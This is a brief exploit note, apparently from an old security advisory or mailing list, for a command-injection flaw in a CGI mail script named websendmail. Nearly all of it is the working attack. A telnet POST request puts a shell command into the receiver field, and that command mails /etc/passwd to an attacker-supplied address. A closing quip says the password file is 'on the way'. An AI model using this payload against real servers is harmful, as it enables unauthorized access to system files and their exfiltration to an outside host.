Exploit:

 telnet target.machine.com 80
  POST /cgi-bin/websendmail HTTP/1.0
  Content-length: 85 (replace 85 with length of the "exploit" line)

receiver=;mail+your_address\@somewhere.org< /etc/passwd;&sender=a&rtnaddr=a&subject=a
&content=a

Don't worry if the server displays an error message. The password file is
on the way :).